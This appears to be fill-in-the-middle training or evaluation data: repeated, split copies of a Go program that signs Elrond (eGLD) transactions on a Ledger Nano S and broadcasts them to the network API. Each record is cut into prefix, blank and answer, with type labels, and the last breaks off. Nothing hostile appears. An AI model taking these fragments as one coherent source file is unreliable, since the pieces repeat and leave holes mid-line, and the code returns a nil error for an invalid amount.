// getTxDataFromUser retrieves tx fields from user
func getTxDataFromUser(contractData uint8) (string, *big.Int, string, error) {
var err error
reader := bufio.NewReader(os.Stdin)
// read destination address
fmt.Print("Enter destination address: ")
strReceiverAddress, _ := reader.ReadString('\n')
if strReceiverAddress == "" {
log.Println(errEmptyAddress)
return "", nil, "", err
}
strReceiverAddress = strings.TrimSpace(strReceiverAddress)
_, _, err = bech32.Decode(strReceiverAddress)
if err != nil {
log.Println(errInvalidAddress)
return "", nil, "", err
}
// read amount
fmt.Printf("Amount of %s to send: ", ticker)
strAmount, _ := reader.ReadString('\n')
strAmount = strings.TrimSpace(strAmount)
bigFloatAmount, ok := big.NewFloat(0).SetPrec(0).SetString(strAmount)
if !ok {
log.Println(errInvalidAmount)
return "", nil, "", err
}
bigFloatAmount.Mul(bigFloatAmount, denomination)
bigIntAmount := new(big.Int)
bigFloatAmount.Int(bigIntAmount)
var data string
if contractData == 1 {
// read data field
fmt.Print("Data field: ")
data, _ = reader.ReadString('\n')
data = strings.TrimSpace(data)
}
return strReceiverAddress, bigIntAmount, data, nil
}
// signTransaction sends the tx to Ledger for user confirmation and signing
func signTransaction(tx *transaction, nanos *ledger.NanoS) error {
toSign, err := json.Marshal(tx)
if err != nil {
return err
}
fmt.Println("Signing transaction. Please confirm on your Ledger")
signature, err := nanos.SignTx(toSign)
if err != nil {
log.Println(errSigningTx)
return err
}
sigHex := hex.EncodeToString(signature)
tx.Signature = sigHex
return nil
}
// broadcastTransaction broadcasts the transaction in the network
func | (tx transaction) error {
jsonTx, _ := json.Marshal(&tx)
resp, err := http.Post(fmt.Sprintf("%s/transaction/send", proxyHost), "",
strings.NewReader(string(jsonTx)))
if err != nil {
log.Println(errSendingTx)
return err
}
body, err := ioutil.ReadAll(resp.Body)
defer func() {
_ = resp.Body.Close()
}()
if err != nil {
log.Println(errSendingTx)
return err
}
res := string(body)
fmt.Printf("Result: %s\n\r", res)
return nil
}
// getAccountAndAddressIndexFromUser retrieves the account and address index from user
func getAccountAndAddressIndexFromUser() (uint32, uint32, error) {
reader := bufio.NewReader(os.Stdin)
fmt.Print("Account: ")
strAccount, _ := reader.ReadString('\n')
strAccount = strings.TrimSpace(strAccount)
account, err := strconv.ParseUint(strAccount, 10, 32)
if err != nil {
return 0, 0, err
}
fmt.Print("Address index: ")
strAddressIndex, _ := reader.ReadString('\n')
strAddressIndex = strings.TrimSpace(strAddressIndex)
addressIndex, err := strconv.ParseUint(strAddressIndex, 10, 32)
if err != nil {
return 0, 0, err
}
return uint32(account), uint32(addressIndex), nil
}
func waitInputAndExit() {
fmt.Println("Press enter to continue...")
_, _ = fmt.Scanln()
os.Exit(1)
}
// main function
func main() {
log.SetFlags(0)
// opening connection with the Ledger device
var nanos *ledger.NanoS
nanos, err := ledger.OpenNanoS()
if err != nil {
log.Println(errOpenDevice, err)
waitInputAndExit()
}
err = getDeviceInfo(nanos)
if err != nil {
log.Println(err)
waitInputAndExit()
}
fmt.Println("Nano S app version: ", nanos.AppVersion)
fmt.Printf("Contract data: %s\n\r", status[nanos.ContractData])
netConfig, err := getNetworkConfig()
if err != nil {
log.Println(errGetNetworkConfig, err)
waitInputAndExit()
}
fmt.Printf("Chain ID: %s\n\rTx version: %v\n\r",
netConfig.Data.Config.ChainID, netConfig.Data.Config.MinTransactionVersion)
if netConfig.Data.Config.ChainID != mainnetId {
ticker = "XeGLD"
}
nanos.Account, nanos.AddressIndex, err = getAccountAndAddressIndexFromUser()
if err != nil {
log.Println(errGetAccountAndAddressIndexFromUser, err)
waitInputAndExit()
}
fmt.Println("Retrieving address. Please confirm on your Ledger")
err = nanos.SetAddress(nanos.Account, nanos.AddressIndex)
if err != nil {
log.Println(errSetAddress, err)
waitInputAndExit()
}
senderAddress, err := nanos.GetAddress(nanos.Account, nanos.AddressIndex)
if err != nil {
log.Println(errGetAddress, err)
waitInputAndExit()
}
fmt.Printf("Address: %s\n\r", senderAddress)
// retrieve sender's nonce and balance
denomination = big.NewFloat(math.Pow10(netConfig.Data.Config.Denomination))
balance, nonce, err := getSenderInfo(string(senderAddress))
if err != nil || balance == nil {
log.Println(errGetBalanceAndNonce, err)
waitInputAndExit()
}
bigFloatBalance, _ := big.NewFloat(0).SetString(balance.String())
bigFloatBalance.Quo(bigFloatBalance, denomination)
strBalance := bigFloatBalance.String()
strSenderShard, err := getAddressShard(string(senderAddress), netConfig.Data.Config.NumShardsWithoutMeta)
if err != nil {
log.Println(errGetAddressShard, err)
waitInputAndExit()
}
fmt.Printf("Sender shard: %v\n\rBalance: %v %s\n\rNonce: %v\n\r", strSenderShard, strBalance, ticker, nonce)
strReceiverAddress, bigIntAmount, data, err := getTxDataFromUser(nanos.ContractData)
if err != nil {
log.Println(err)
waitInputAndExit()
}
strReceiverShard, err := getAddressShard(strReceiverAddress, netConfig.Data.Config.NumShardsWithoutMeta)
if err != nil {
log.Println(errGetAddressShard, err)
waitInputAndExit()
}
fmt.Printf("Receiver shard: %v\n\r", strReceiverShard)
// generate and sign transaction
var tx transaction
tx.SndAddr = string(senderAddress)
tx.RcvAddr = strReceiverAddress
tx.Value = bigIntAmount.String()
tx.Nonce = nonce
tx.GasPrice = netConfig.Data.Config.MinGasPrice
tx.Data = []byte(data)
tx.GasLimit = netConfig.Data.Config.MinGasLimit + uint64(len(data))*netConfig.Data.Config.GasPerDataByte
tx.ChainID = netConfig.Data.Config.ChainID
tx.Version = netConfig.Data.Config.MinTransactionVersion
err = signTransaction(&tx, nanos)
if err != nil {
log.Println(err)
waitInputAndExit()
}
err = broadcastTransaction(tx)
if err != nil {
log.Println(err)
}
waitInputAndExit()
}
| broadcastTransaction | identifier_name |
main.go | package main
import (
"bufio"
"encoding/hex"
"encoding/json"
"errors"
"fmt"
"io/ioutil"
"log"
"math"
"math/big"
"net/http"
"os"
"strconv"
"strings"
"github.com/ElrondNetwork/ledger-elrond/testApp/ledger"
"github.com/btcsuite/btcutil/bech32"
)
const proxyHost string = "https://api.elrond.com" // https://api-testnet.elrond.com for testnet
const (
hrp = "erd"
mainnetId = "1"
)
var ticker = "eGLD"
var status = [...]string{"Disabled", "Enabled"}
var denomination *big.Float
const (
errOpenDevice = "couldn't open device"
errGetAppVersion = "couldn't get app version"
errGetConfig = "couldn't get configuration"
errSetAddress = "couldn't set account and address index"
errGetAddress = "couldn't get address"
errGetNetworkConfig = "couldn't get network config"
errGetBalanceAndNonce = "couldn't get address balance and nonce"
errEmptyAddress = "empty address"
errInvalidAddress = "invalid receiver address"
errInvalidAmount = "invalid eGLD amount"
errSigningTx = "signing error"
errSendingTx = "error sending tx"
errInvalidBalanceString = "invalid balance string"
errInvalidHRP = "invalid bech32 hrp"
errGetAddressShard = "getAddressShard error"
errGetAccountAndAddressIndexFromUser = "invalid account or address index provided by user"
)
type networkConfig struct {
Data struct {
Config struct {
ChainID string `json:"erd_chain_id"`
Denomination int `json:"erd_denomination"`
GasPerDataByte uint64 `json:"erd_gas_per_data_byte"`
LatestTagSoftwareVersion string `json:"erd_latest_tag_software_version"`
MetaConsensusGroupSize uint32 `json:"erd_meta_consensus_group_size"`
MinGasLimit uint64 `json:"erd_min_gas_limit"`
MinGasPrice uint64 `json:"erd_min_gas_price"`
MinTransactionVersion uint32 `json:"erd_min_transaction_version"`
NumMetachainNodes uint32 `json:"erd_num_metachain_nodes"`
NumNodesInShard uint32 `json:"erd_num_nodes_in_shard"`
NumShardsWithoutMeta uint32 `json:"erd_num_shards_without_meta"`
RoundDuration uint32 `json:"erd_round_duration"`
ShardConsensusGroupSize uint32 `json:"erd_shard_consensus_group_size"`
StartTime uint32 `json:"erd_start_time"`
} `json:"config"`
} `json:"data"`
}
type transaction struct {
Nonce uint64 `json:"nonce"`
Value string `json:"value"`
RcvAddr string `json:"receiver"`
SndAddr string `json:"sender"`
GasPrice uint64 `json:"gasPrice,omitempty"`
GasLimit uint64 `json:"gasLimit,omitempty"`
Data []byte `json:"data,omitempty"`
Signature string `json:"signature,omitempty"`
ChainID string `json:"chainID"`
Version uint32 `json:"version"`
}
type getAccountResponse struct {
Data struct {
Account struct {
Address string `json:"address"`
Nonce uint64 `json:"nonce"`
Balance string `json:"balance"`
} `json:"account"`
} `json:"data"`
}
// getSenderInfo returns the balance and nonce of an address
func getSenderInfo(address string) (*big.Int, uint64, error) {
req, err := http.NewRequest(http.MethodGet,
fmt.Sprintf("%s/address/%s", proxyHost, address), nil)
if err != nil {
return nil, 0, err
}
client := http.DefaultClient
resp, err := client.Do(req)
if err != nil {
return nil, 0, err
}
body, err := ioutil.ReadAll(resp.Body)
defer func() {
_ = resp.Body.Close()
}()
if err != nil {
return nil, 0, err
}
var accInfo getAccountResponse
err = json.Unmarshal(body, &accInfo)
if err != nil {
return nil, 0, err
}
balance, ok := big.NewInt(0).SetString(accInfo.Data.Account.Balance, 10)
if !ok {
return nil, 0, errors.New(errInvalidBalanceString)
}
return balance, accInfo.Data.Account.Nonce, nil
}
// getAddressShard returns the assigned shard of an address
func getAddressShard(bech32Address string, noOfShards uint32) (uint32, error) {
// convert sender from bech32 to hex pubkey
h, pubkeyBech32, err := bech32.Decode(bech32Address)
if err != nil {
return 0, err
}
if h != hrp {
return 0, errors.New(errInvalidHRP)
}
pubkey, err := bech32.ConvertBits(pubkeyBech32, 5, 8, false)
if err != nil {
return 0, err
}
address := hex.EncodeToString(pubkey)
n := math.Ceil(math.Log2(float64(noOfShards)))
var maskHigh, maskLow uint32 = (1 << uint(n)) - 1, (1 << uint(n-1)) - 1
addressBytes, err := hex.DecodeString(address)
if err != nil {
return 0, err
}
addr := uint32(addressBytes[len(addressBytes)-1])
shard := addr & maskHigh
if shard > noOfShards-1 {
shard = addr & maskLow
}
return shard, nil
}
// getNetworkConfig reads the network config from the proxy and returns a networkConfig object
func getNetworkConfig() (*networkConfig, error) {
req, err := http.NewRequest(http.MethodGet, fmt.Sprintf("%s/network/config", proxyHost), nil)
if err != nil {
return nil, err
}
client := http.DefaultClient
resp, err := client.Do(req)
if err != nil {
return nil, err
}
body, err := ioutil.ReadAll(resp.Body)
defer func() {
_ = resp.Body.Close()
}()
if err != nil {
return nil, err
}
netConfig := &networkConfig{}
err = json.Unmarshal(body, netConfig)
if err != nil {
return nil, err
}
return netConfig, nil
}
// getDeviceInfo retrieves various informations from Ledger
func getDeviceInfo(nanos *ledger.NanoS) error {
err := nanos.GetVersion()
if err != nil {
log.Println(errGetAppVersion)
return err
}
err = nanos.GetConfiguration()
if err != nil {
log.Println(errGetConfig)
return err
}
return nil
}
// getTxDataFromUser retrieves tx fields from user
func getTxDataFromUser(contractData uint8) (string, *big.Int, string, error) {
var err error
reader := bufio.NewReader(os.Stdin)
// read destination address
fmt.Print("Enter destination address: ")
strReceiverAddress, _ := reader.ReadString('\n')
if strReceiverAddress == "" {
log.Println(errEmptyAddress)
return "", nil, "", err
}
strReceiverAddress = strings.TrimSpace(strReceiverAddress)
_, _, err = bech32.Decode(strReceiverAddress)
if err != nil {
log.Println(errInvalidAddress)
return "", nil, "", err
}
// read amount
fmt.Printf("Amount of %s to send: ", ticker)
strAmount, _ := reader.ReadString('\n')
strAmount = strings.TrimSpace(strAmount)
bigFloatAmount, ok := big.NewFloat(0).SetPrec(0).SetString(strAmount)
if !ok {
log.Println(errInvalidAmount)
return "", nil, "", err
}
bigFloatAmount.Mul(bigFloatAmount, denomination)
bigIntAmount := new(big.Int)
bigFloatAmount.Int(bigIntAmount)
var data string
if contractData == 1 {
// read data field
fmt.Print("Data field: ")
data, _ = reader.ReadString('\n')
data = strings.TrimSpace(data)
}
return strReceiverAddress, bigIntAmount, data, nil
}
// signTransaction sends the tx to Ledger for user confirmation and signing
func signTransaction(tx *transaction, nanos *ledger.NanoS) error {
toSign, err := json.Marshal(tx)
if err != nil {
return err
}
fmt.Println("Signing transaction. Please confirm on your Ledger")
signature, err := nanos.SignTx(toSign)
if err != nil {
log.Println(errSigningTx)
return err
}
sigHex := hex.EncodeToString(signature)
tx.Signature = sigHex
return nil
}
// broadcastTransaction broadcasts the transaction in the network
func broadcastTransaction(tx transaction) error {
jsonTx, _ := json.Marshal(&tx)
resp, err := http.Post(fmt.Sprintf("%s/transaction/send", proxyHost), "",
strings.NewReader(string(jsonTx)))
if err != nil {
log.Println(errSendingTx)
return err
}
body, err := ioutil.ReadAll(resp.Body)
defer func() {
_ = resp.Body.Close()
}()
if err != nil {
log.Println(errSendingTx)
return err
}
res := string(body)
fmt.Printf("Result: %s\n\r", res)
return nil
}
// getAccountAndAddressIndexFromUser retrieves the account and address index from user
func getAccountAndAddressIndexFromUser() (uint32, uint32, error) {
reader := bufio.NewReader(os.Stdin)
fmt.Print("Account: ")
strAccount, _ := reader.ReadString('\n')
strAccount = strings.TrimSpace(strAccount)
account, err := strconv.ParseUint(strAccount, 10, 32)
if err != nil {
return 0, 0, err
}
fmt.Print("Address index: ")
strAddressIndex, _ := reader.ReadString('\n')
strAddressIndex = strings.TrimSpace(strAddressIndex)
addressIndex, err := strconv.ParseUint(strAddressIndex, 10, 32)
if err != nil {
return 0, 0, err
}
return uint32(account), uint32(addressIndex), nil
}
func waitInputAndExit() {
fmt.Println("Press enter to continue...")
_, _ = fmt.Scanln()
os.Exit(1)
}
// main function
func main() | {
log.SetFlags(0)
// opening connection with the Ledger device
var nanos *ledger.NanoS
nanos, err := ledger.OpenNanoS()
if err != nil {
log.Println(errOpenDevice, err)
waitInputAndExit()
}
err = getDeviceInfo(nanos)
if err != nil {
log.Println(err)
waitInputAndExit()
}
fmt.Println("Nano S app version: ", nanos.AppVersion)
fmt.Printf("Contract data: %s\n\r", status[nanos.ContractData])
netConfig, err := getNetworkConfig()
if err != nil {
log.Println(errGetNetworkConfig, err)
waitInputAndExit()
}
fmt.Printf("Chain ID: %s\n\rTx version: %v\n\r",
netConfig.Data.Config.ChainID, netConfig.Data.Config.MinTransactionVersion)
if netConfig.Data.Config.ChainID != mainnetId {
ticker = "XeGLD"
}
nanos.Account, nanos.AddressIndex, err = getAccountAndAddressIndexFromUser()
if err != nil {
log.Println(errGetAccountAndAddressIndexFromUser, err)
waitInputAndExit()
}
fmt.Println("Retrieving address. Please confirm on your Ledger")
err = nanos.SetAddress(nanos.Account, nanos.AddressIndex)
if err != nil {
log.Println(errSetAddress, err)
waitInputAndExit()
}
senderAddress, err := nanos.GetAddress(nanos.Account, nanos.AddressIndex)
if err != nil {
log.Println(errGetAddress, err)
waitInputAndExit()
}
fmt.Printf("Address: %s\n\r", senderAddress)
// retrieve sender's nonce and balance
denomination = big.NewFloat(math.Pow10(netConfig.Data.Config.Denomination))
balance, nonce, err := getSenderInfo(string(senderAddress))
if err != nil || balance == nil {
log.Println(errGetBalanceAndNonce, err)
waitInputAndExit()
}
bigFloatBalance, _ := big.NewFloat(0).SetString(balance.String())
bigFloatBalance.Quo(bigFloatBalance, denomination)
strBalance := bigFloatBalance.String()
strSenderShard, err := getAddressShard(string(senderAddress), netConfig.Data.Config.NumShardsWithoutMeta)
if err != nil {
log.Println(errGetAddressShard, err)
waitInputAndExit()
}
fmt.Printf("Sender shard: %v\n\rBalance: %v %s\n\rNonce: %v\n\r", strSenderShard, strBalance, ticker, nonce)
strReceiverAddress, bigIntAmount, data, err := getTxDataFromUser(nanos.ContractData)
if err != nil {
log.Println(err)
waitInputAndExit()
}
strReceiverShard, err := getAddressShard(strReceiverAddress, netConfig.Data.Config.NumShardsWithoutMeta)
if err != nil {
log.Println(errGetAddressShard, err)
waitInputAndExit()
}
fmt.Printf("Receiver shard: %v\n\r", strReceiverShard)
// generate and sign transaction
var tx transaction
tx.SndAddr = string(senderAddress)
tx.RcvAddr = strReceiverAddress
tx.Value = bigIntAmount.String()
tx.Nonce = nonce
tx.GasPrice = netConfig.Data.Config.MinGasPrice
tx.Data = []byte(data)
tx.GasLimit = netConfig.Data.Config.MinGasLimit + uint64(len(data))*netConfig.Data.Config.GasPerDataByte
tx.ChainID = netConfig.Data.Config.ChainID
tx.Version = netConfig.Data.Config.MinTransactionVersion
err = signTransaction(&tx, nanos)
if err != nil {
log.Println(err)
waitInputAndExit()
}
err = broadcastTransaction(tx)
if err != nil {
log.Println(err)
}
waitInputAndExit()
} | identifier_body | |
main.go | package main
import (
"bufio"
"encoding/hex"
"encoding/json"
"errors"
"fmt"
"io/ioutil"
"log"
"math"
"math/big"
"net/http"
"os"
"strconv"
"strings"
"github.com/ElrondNetwork/ledger-elrond/testApp/ledger"
"github.com/btcsuite/btcutil/bech32"
)
const proxyHost string = "https://api.elrond.com" // https://api-testnet.elrond.com for testnet
const (
hrp = "erd"
mainnetId = "1"
)
var ticker = "eGLD"
var status = [...]string{"Disabled", "Enabled"}
var denomination *big.Float
const (
errOpenDevice = "couldn't open device"
errGetAppVersion = "couldn't get app version"
errGetConfig = "couldn't get configuration"
errSetAddress = "couldn't set account and address index"
errGetAddress = "couldn't get address"
errGetNetworkConfig = "couldn't get network config"
errGetBalanceAndNonce = "couldn't get address balance and nonce"
errEmptyAddress = "empty address"
errInvalidAddress = "invalid receiver address"
errInvalidAmount = "invalid eGLD amount"
errSigningTx = "signing error"
errSendingTx = "error sending tx"
errInvalidBalanceString = "invalid balance string"
errInvalidHRP = "invalid bech32 hrp"
errGetAddressShard = "getAddressShard error"
errGetAccountAndAddressIndexFromUser = "invalid account or address index provided by user"
)
type networkConfig struct {
Data struct {
Config struct {
ChainID string `json:"erd_chain_id"`
Denomination int `json:"erd_denomination"`
GasPerDataByte uint64 `json:"erd_gas_per_data_byte"`
LatestTagSoftwareVersion string `json:"erd_latest_tag_software_version"`
MetaConsensusGroupSize uint32 `json:"erd_meta_consensus_group_size"`
MinGasLimit uint64 `json:"erd_min_gas_limit"`
MinGasPrice uint64 `json:"erd_min_gas_price"`
MinTransactionVersion uint32 `json:"erd_min_transaction_version"`
NumMetachainNodes uint32 `json:"erd_num_metachain_nodes"`
NumNodesInShard uint32 `json:"erd_num_nodes_in_shard"`
NumShardsWithoutMeta uint32 `json:"erd_num_shards_without_meta"`
RoundDuration uint32 `json:"erd_round_duration"`
ShardConsensusGroupSize uint32 `json:"erd_shard_consensus_group_size"`
StartTime uint32 `json:"erd_start_time"`
} `json:"config"`
} `json:"data"`
}
type transaction struct {
Nonce uint64 `json:"nonce"`
Value string `json:"value"`
RcvAddr string `json:"receiver"`
SndAddr string `json:"sender"`
GasPrice uint64 `json:"gasPrice,omitempty"`
GasLimit uint64 `json:"gasLimit,omitempty"`
Data []byte `json:"data,omitempty"`
Signature string `json:"signature,omitempty"`
ChainID string `json:"chainID"`
Version uint32 `json:"version"`
}
type getAccountResponse struct {
Data struct {
Account struct {
Address string `json:"address"`
Nonce uint64 `json:"nonce"`
Balance string `json:"balance"`
} `json:"account"`
} `json:"data"`
}
// getSenderInfo returns the balance and nonce of an address
func getSenderInfo(address string) (*big.Int, uint64, error) {
req, err := http.NewRequest(http.MethodGet,
fmt.Sprintf("%s/address/%s", proxyHost, address), nil)
if err != nil {
return nil, 0, err
}
client := http.DefaultClient
resp, err := client.Do(req)
if err != nil {
return nil, 0, err
}
body, err := ioutil.ReadAll(resp.Body)
defer func() {
_ = resp.Body.Close()
}()
if err != nil {
return nil, 0, err
}
var accInfo getAccountResponse
err = json.Unmarshal(body, &accInfo)
if err != nil {
return nil, 0, err
}
balance, ok := big.NewInt(0).SetString(accInfo.Data.Account.Balance, 10)
if !ok {
return nil, 0, errors.New(errInvalidBalanceString)
}
return balance, accInfo.Data.Account.Nonce, nil
}
// getAddressShard returns the assigned shard of an address
func getAddressShard(bech32Address string, noOfShards uint32) (uint32, error) {
// convert sender from bech32 to hex pubkey
h, pubkeyBech32, err := bech32.Decode(bech32Address)
if err != nil {
return 0, err
}
if h != hrp {
return 0, errors.New(errInvalidHRP)
}
pubkey, err := bech32.ConvertBits(pubkeyBech32, 5, 8, false)
if err != nil {
return 0, err
}
address := hex.EncodeToString(pubkey)
n := math.Ceil(math.Log2(float64(noOfShards)))
var maskHigh, maskLow uint32 = (1 << uint(n)) - 1, (1 << uint(n-1)) - 1
addressBytes, err := hex.DecodeString(address)
if err != nil |
addr := uint32(addressBytes[len(addressBytes)-1])
shard := addr & maskHigh
if shard > noOfShards-1 {
shard = addr & maskLow
}
return shard, nil
}
// getNetworkConfig reads the network config from the proxy and returns a networkConfig object
func getNetworkConfig() (*networkConfig, error) {
req, err := http.NewRequest(http.MethodGet, fmt.Sprintf("%s/network/config", proxyHost), nil)
if err != nil {
return nil, err
}
client := http.DefaultClient
resp, err := client.Do(req)
if err != nil {
return nil, err
}
body, err := ioutil.ReadAll(resp.Body)
defer func() {
_ = resp.Body.Close()
}()
if err != nil {
return nil, err
}
netConfig := &networkConfig{}
err = json.Unmarshal(body, netConfig)
if err != nil {
return nil, err
}
return netConfig, nil
}
// getDeviceInfo retrieves various informations from Ledger
func getDeviceInfo(nanos *ledger.NanoS) error {
err := nanos.GetVersion()
if err != nil {
log.Println(errGetAppVersion)
return err
}
err = nanos.GetConfiguration()
if err != nil {
log.Println(errGetConfig)
return err
}
return nil
}
// getTxDataFromUser retrieves tx fields from user
func getTxDataFromUser(contractData uint8) (string, *big.Int, string, error) {
var err error
reader := bufio.NewReader(os.Stdin)
// read destination address
fmt.Print("Enter destination address: ")
strReceiverAddress, _ := reader.ReadString('\n')
if strReceiverAddress == "" {
log.Println(errEmptyAddress)
return "", nil, "", err
}
strReceiverAddress = strings.TrimSpace(strReceiverAddress)
_, _, err = bech32.Decode(strReceiverAddress)
if err != nil {
log.Println(errInvalidAddress)
return "", nil, "", err
}
// read amount
fmt.Printf("Amount of %s to send: ", ticker)
strAmount, _ := reader.ReadString('\n')
strAmount = strings.TrimSpace(strAmount)
bigFloatAmount, ok := big.NewFloat(0).SetPrec(0).SetString(strAmount)
if !ok {
log.Println(errInvalidAmount)
return "", nil, "", err
}
bigFloatAmount.Mul(bigFloatAmount, denomination)
bigIntAmount := new(big.Int)
bigFloatAmount.Int(bigIntAmount)
var data string
if contractData == 1 {
// read data field
fmt.Print("Data field: ")
data, _ = reader.ReadString('\n')
data = strings.TrimSpace(data)
}
return strReceiverAddress, bigIntAmount, data, nil
}
// signTransaction sends the tx to Ledger for user confirmation and signing
func signTransaction(tx *transaction, nanos *ledger.NanoS) error {
toSign, err := json.Marshal(tx)
if err != nil {
return err
}
fmt.Println("Signing transaction. Please confirm on your Ledger")
signature, err := nanos.SignTx(toSign)
if err != nil {
log.Println(errSigningTx)
return err
}
sigHex := hex.EncodeToString(signature)
tx.Signature = sigHex
return nil
}
// broadcastTransaction broadcasts the transaction in the network
func broadcastTransaction(tx transaction) error {
jsonTx, _ := json.Marshal(&tx)
resp, err := http.Post(fmt.Sprintf("%s/transaction/send", proxyHost), "",
strings.NewReader(string(jsonTx)))
if err != nil {
log.Println(errSendingTx)
return err
}
body, err := ioutil.ReadAll(resp.Body)
defer func() {
_ = resp.Body.Close()
}()
if err != nil {
log.Println(errSendingTx)
return err
}
res := string(body)
fmt.Printf("Result: %s\n\r", res)
return nil
}
// getAccountAndAddressIndexFromUser retrieves the account and address index from user
func getAccountAndAddressIndexFromUser() (uint32, uint32, error) {
reader := bufio.NewReader(os.Stdin)
fmt.Print("Account: ")
strAccount, _ := reader.ReadString('\n')
strAccount = strings.TrimSpace(strAccount)
account, err := strconv.ParseUint(strAccount, 10, 32)
if err != nil {
return 0, 0, err
}
fmt.Print("Address index: ")
strAddressIndex, _ := reader.ReadString('\n')
strAddressIndex = strings.TrimSpace(strAddressIndex)
addressIndex, err := strconv.ParseUint(strAddressIndex, 10, 32)
if err != nil {
return 0, 0, err
}
return uint32(account), uint32(addressIndex), nil
}
func waitInputAndExit() {
fmt.Println("Press enter to continue...")
_, _ = fmt.Scanln()
os.Exit(1)
}
// main function
func main() {
log.SetFlags(0)
// opening connection with the Ledger device
var nanos *ledger.NanoS
nanos, err := ledger.OpenNanoS()
if err != nil {
log.Println(errOpenDevice, err)
waitInputAndExit()
}
err = getDeviceInfo(nanos)
if err != nil {
log.Println(err)
waitInputAndExit()
}
fmt.Println("Nano S app version: ", nanos.AppVersion)
fmt.Printf("Contract data: %s\n\r", status[nanos.ContractData])
netConfig, err := getNetworkConfig()
if err != nil {
log.Println(errGetNetworkConfig, err)
waitInputAndExit()
}
fmt.Printf("Chain ID: %s\n\rTx version: %v\n\r",
netConfig.Data.Config.ChainID, netConfig.Data.Config.MinTransactionVersion)
if netConfig.Data.Config.ChainID != mainnetId {
ticker = "XeGLD"
}
nanos.Account, nanos.AddressIndex, err = getAccountAndAddressIndexFromUser()
if err != nil {
log.Println(errGetAccountAndAddressIndexFromUser, err)
waitInputAndExit()
}
fmt.Println("Retrieving address. Please confirm on your Ledger")
err = nanos.SetAddress(nanos.Account, nanos.AddressIndex)
if err != nil {
log.Println(errSetAddress, err)
waitInputAndExit()
}
senderAddress, err := nanos.GetAddress(nanos.Account, nanos.AddressIndex)
if err != nil {
log.Println(errGetAddress, err)
waitInputAndExit()
}
fmt.Printf("Address: %s\n\r", senderAddress)
// retrieve sender's nonce and balance
denomination = big.NewFloat(math.Pow10(netConfig.Data.Config.Denomination))
balance, nonce, err := getSenderInfo(string(senderAddress))
if err != nil || balance == nil {
log.Println(errGetBalanceAndNonce, err)
waitInputAndExit()
}
bigFloatBalance, _ := big.NewFloat(0).SetString(balance.String())
bigFloatBalance.Quo(bigFloatBalance, denomination)
strBalance := bigFloatBalance.String()
strSenderShard, err := getAddressShard(string(senderAddress), netConfig.Data.Config.NumShardsWithoutMeta)
if err != nil {
log.Println(errGetAddressShard, err)
waitInputAndExit()
}
fmt.Printf("Sender shard: %v\n\rBalance: %v %s\n\rNonce: %v\n\r", strSenderShard, strBalance, ticker, nonce)
strReceiverAddress, bigIntAmount, data, err := getTxDataFromUser(nanos.ContractData)
if err != nil {
log.Println(err)
waitInputAndExit()
}
strReceiverShard, err := getAddressShard(strReceiverAddress, netConfig.Data.Config.NumShardsWithoutMeta)
if err != nil {
log.Println(errGetAddressShard, err)
waitInputAndExit()
}
fmt.Printf("Receiver shard: %v\n\r", strReceiverShard)
// generate and sign transaction
var tx transaction
tx.SndAddr = string(senderAddress)
tx.RcvAddr = strReceiverAddress
tx.Value = bigIntAmount.String()
tx.Nonce = nonce
tx.GasPrice = netConfig.Data.Config.MinGasPrice
tx.Data = []byte(data)
tx.GasLimit = netConfig.Data.Config.MinGasLimit + uint64(len(data))*netConfig.Data.Config.GasPerDataByte
tx.ChainID = netConfig.Data.Config.ChainID
tx.Version = netConfig.Data.Config.MinTransactionVersion
err = signTransaction(&tx, nanos)
if err != nil {
log.Println(err)
waitInputAndExit()
}
err = broadcastTransaction(tx)
if err != nil {
log.Println(err)
}
waitInputAndExit()
}
| {
return 0, err
} | conditional_block |
main.go | package main
import (
"bufio"
"encoding/hex"
"encoding/json"
"errors"
"fmt"
"io/ioutil"
"log"
"math"
"math/big"
"net/http"
"os"
"strconv"
"strings"
"github.com/ElrondNetwork/ledger-elrond/testApp/ledger"
"github.com/btcsuite/btcutil/bech32"
)
const proxyHost string = "https://api.elrond.com" // https://api-testnet.elrond.com for testnet
const (
hrp = "erd"
mainnetId = "1"
)
var ticker = "eGLD"
var status = [...]string{"Disabled", "Enabled"}
var denomination *big.Float
const (
errOpenDevice = "couldn't open device"
errGetAppVersion = "couldn't get app version"
errGetConfig = "couldn't get configuration"
errSetAddress = "couldn't set account and address index"
errGetAddress = "couldn't get address"
errGetNetworkConfig = "couldn't get network config"
errGetBalanceAndNonce = "couldn't get address balance and nonce"
errEmptyAddress = "empty address"
errInvalidAddress = "invalid receiver address"
errInvalidAmount = "invalid eGLD amount"
errSigningTx = "signing error"
errSendingTx = "error sending tx"
errInvalidBalanceString = "invalid balance string"
errInvalidHRP = "invalid bech32 hrp"
errGetAddressShard = "getAddressShard error"
errGetAccountAndAddressIndexFromUser = "invalid account or address index provided by user"
)
type networkConfig struct {
Data struct {
Config struct {
ChainID string `json:"erd_chain_id"`
Denomination int `json:"erd_denomination"`
GasPerDataByte uint64 `json:"erd_gas_per_data_byte"`
LatestTagSoftwareVersion string `json:"erd_latest_tag_software_version"`
MetaConsensusGroupSize uint32 `json:"erd_meta_consensus_group_size"`
MinGasLimit uint64 `json:"erd_min_gas_limit"`
MinGasPrice uint64 `json:"erd_min_gas_price"`
MinTransactionVersion uint32 `json:"erd_min_transaction_version"`
NumMetachainNodes uint32 `json:"erd_num_metachain_nodes"`
NumNodesInShard uint32 `json:"erd_num_nodes_in_shard"`
NumShardsWithoutMeta uint32 `json:"erd_num_shards_without_meta"`
RoundDuration uint32 `json:"erd_round_duration"`
ShardConsensusGroupSize uint32 `json:"erd_shard_consensus_group_size"`
StartTime uint32 `json:"erd_start_time"`
} `json:"config"`
} `json:"data"`
}
type transaction struct {
Nonce uint64 `json:"nonce"`
Value string `json:"value"`
RcvAddr string `json:"receiver"`
SndAddr string `json:"sender"`
GasPrice uint64 `json:"gasPrice,omitempty"`
GasLimit uint64 `json:"gasLimit,omitempty"`
Data []byte `json:"data,omitempty"`
Signature string `json:"signature,omitempty"`
ChainID string `json:"chainID"`
Version uint32 `json:"version"`
}
type getAccountResponse struct {
Data struct {
Account struct {
Address string `json:"address"`
Nonce uint64 `json:"nonce"`
Balance string `json:"balance"`
} `json:"account"`
} `json:"data"`
}
// getSenderInfo returns the balance and nonce of an address
func getSenderInfo(address string) (*big.Int, uint64, error) {
req, err := http.NewRequest(http.MethodGet,
fmt.Sprintf("%s/address/%s", proxyHost, address), nil)
if err != nil {
return nil, 0, err
}
client := http.DefaultClient
resp, err := client.Do(req)
if err != nil {
return nil, 0, err
}
body, err := ioutil.ReadAll(resp.Body)
defer func() {
_ = resp.Body.Close()
}()
if err != nil {
return nil, 0, err
}
